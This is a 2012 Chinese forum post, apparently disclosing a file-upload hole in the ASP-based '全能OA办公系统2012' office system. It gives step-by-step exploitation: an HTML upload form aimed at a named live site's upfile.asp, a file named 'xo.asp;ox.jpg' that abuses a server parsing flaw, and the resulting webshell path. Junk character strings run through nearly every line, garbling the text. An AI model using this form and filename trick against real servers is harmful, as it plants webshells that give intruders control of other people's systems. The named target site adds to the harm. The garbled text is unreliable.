全能OA办公系统 上传漏洞3 r8 [' W( C$ X) D G& }& m
4 i/ C3 j2 C" i: G- {; o1 s+ l系统介绍:
1 n6 j1 S& _: _. f5 g
+ Y p& Z9 A1 y( n% O( N全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
6 O. ?, l& b1 ~7 A% A, d" H G9 _& }# e! ~: ?! h. x9 [( h" c( H7 a
主要功能:
) d% W% J3 T* b) E4 S, t' B1 B2 u9 m公司通告
) m4 k# e' A: I* h& y工作计划 8 Z3 N( U$ y. u* o% U- `& e) _! V
通讯助理 6 P* V! Z1 s. H" y2 J+ s J4 J4 t; I
客户资源
6 ]8 x1 U; e2 l( [ W) Q我的公文
. y# t4 Y# I8 z" E5 s2 m公文传阅 9 `1 F& h4 [# ?- F7 M% C) H7 Z
公共资源 ; c9 @# n- X; ?& B! t J8 A
资源预约 2 i3 D9 I2 I% X! V/ O
今日考勤 6 F, M, [- O$ i+ B4 ^6 L
个人计划
3 M9 K7 A; q1 J' w& U个人通讯录 1 f. i$ g4 K- G& s* f
个人基本档案
. y" N3 M2 z+ N [未读邮件
0 }; f( z1 L7 u* H; j- j2 N发邮件
' l* u# l* d- \- G3 i2 a收件夹 8 g4 y2 ^* H2 d: W
寄件夹 , r, o2 \/ ?. n- d4 y$ j* E7 k
网络硬盘 " M/ B' M ~1 i9 Q# L
网络会议 1 d8 I! p U M$ J: F4 g
网络调查 7 M" R5 H7 [3 A$ t
交流论坛) b6 q4 ^ H; Z
: H3 z) W. {) V1 [: @
有兴趣测试的朋友可以下源码看看
) H$ b* r) V& y& K4 E$ `7 _
+ b" A4 e0 ? B2 z+ o/ t1 l- ]$ W源码下载:
/ Q2 B$ m$ }* r. ^% Z$ u) ]6 \. z/ ]. k9 P5 d) b5 K
http://www.mycodes.net/30/4750.htm2 F8 p/ E& ~. Q K
/ u- N7 C" K/ C9 o" w
漏洞介绍:
; @4 f g) A7 ]+ D, F9 V
. s' C! E) `6 w6 t9 R由upfile.asp上传文件漏洞引起
; K( E/ ^. d0 d3 `0 C6 Q
$ V7 F" y7 v: ^& a n测试方法:
: ?% @. w6 P' `. X* k& S$ R
5 T, d1 F; ] c* p1 j使用名小子上传http://www.itlynn.com/upfile.asp即可
8 L) [8 |2 A9 A! E0 ]& j/ J9 a! M! o3 g( U f1 k& [5 u9 L
如果upfile.asp文件被删除不存在。
4 A5 d7 @, e! k, [# z/ v% L; C& b
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。% [ o+ K3 f$ g* f, \! E o5 N
+ F* D+ C E9 T0 u" ^/ u4 N
如果存在那么将如下代码保存为upfile.html。
5 w6 Z, D$ y! A+ l* K
$ J" M6 r$ f! {8 K然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。1 L8 z- B8 R9 c2 |
7 `( m) y! r+ Z# L( h a* `
6 _4 ^# S* X: d- ^$ w3 r r
+ D, u3 F- y! d# a7 e; t
01 <table border='0' align="center" cellpadding="5"> ' U4 l( ?$ @+ r8 }9 R1 E
! r) F) b7 `# F% P2 @
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> ; j1 E3 W0 \+ t% u1 A
" J+ T( i& Z, q8 u
03 <tr> 3 S; d2 ~8 F: g( E3 U9 _# Z
; G& m8 _& f i- b6 P }* ^/ M1 l% m
04 <td>报错:</td> ! s- v1 U/ x5 _
! E; F( o1 v8 ~- l
05 <td><input type='radio' name='errnumber' value='0'>
5 t. }' G! W9 V& K! ]0 p9 F* j- i4 n1 Q4 U1 b
06 自动更名 ( o5 e) F' J) |
3 N' U) `9 f4 N& o; z8 ]
07 <input type='radio' name='errnumber' value='1' checked> 2 I! ~! K+ m) M/ p1 {
( o) V7 X, R/ ?& l- M- J0 i
08 报错方式
7 Q6 N# i$ q2 {* F1 T. N+ M5 S4 { l$ Q0 w: E' H
09 <input type='radio' name='errnumber' value='2'> $ A, t" I6 p3 }# b% _( X
5 k9 s0 h/ b& Z* c2 W: t: v
10 直接覆盖</td>
$ b* _+ p$ S: y! I& X
8 {% O8 v. h+ W2 k6 R" }11 </tr>
; }. D1 n" e' S2 e4 P5 k: {( v- r8 N/ n
12 <tr> 9 B0 l1 {4 _5 T& q, P( M# ^& d
: K& D- X: m) G. {; }13 <td>主题:</td>
" ^0 x* B" F) g6 C% P2 G- T, Z! _* e! k# n
14 <td><input type='text' name='filename' size='30'></td> 9 B8 k( n8 \* K% n
1 O* v9 b9 {+ @; j- j( W
15 </tr>
S% {7 W. s Z! H
/ D9 a1 e. A+ A16 <tr> & c o) |. ~/ ]/ o
: c! Y g3 M! P' |17 <td>文件:</td>
% _% G, `9 c; R# |' n# y1 O% U+ T' K9 Z( ?6 P v
18 <td><input type="file"name="fruit"size="30"></td> ! ]' f3 ]2 o5 a# q: k" I+ t
1 @8 D+ e4 }: X V/ b19 </tr>
8 }9 Y N0 V: w( [4 K3 x
0 ~/ z4 i( N ^0 x20 <tr>
2 f+ M; F k" M$ J9 @$ G( J- G# n: J F5 L( D! a2 @( l
21 <td valign='top'>简介:</td> ( B' F Y1 Q8 E9 p
% g! ]2 P5 J( W2 Y! L9 V1 D! f
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
* W# e6 _. S0 [% J! l1 m8 q5 @6 P5 B7 E# Y- R, o- [" Z
23 </tr>
$ d$ h* p0 |6 b7 m
' S. R6 f4 X$ F24
- J( W6 ?5 W% P% ^; n: j# h( f* h3 Z1 B) t& ^% f+ b! S% {
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
( j: x r0 E* e2 U
# h! N" x0 A8 }26 </tr>
1 f; B0 `7 d) o, @7 O" B2 A7 o+ o! R
* a7 v( q/ \, S: L+ d27 </form> * Q; G' {# G$ K8 x3 {0 n
G, `/ S: y; k }1 K' H1 g
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
B: C; V( a0 a# Y
/ s( m" w" A9 X6 B0 f2 m0 w 8 l( j- L8 J" F x
+ H& E( H) U; ^( t% X+ \5 M* O上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg; e i1 C$ N2 z) q
/ ~- `! T6 O' p7 ^& P此漏洞需要配合解析漏洞利用。
+ y. U" Q* n9 y1 w2 ^! ^2 a6 @5 b2 {7 Y1 E& f3 _" w; W
|
发表于 2012-11-21 13:45:12
收藏
支持
反对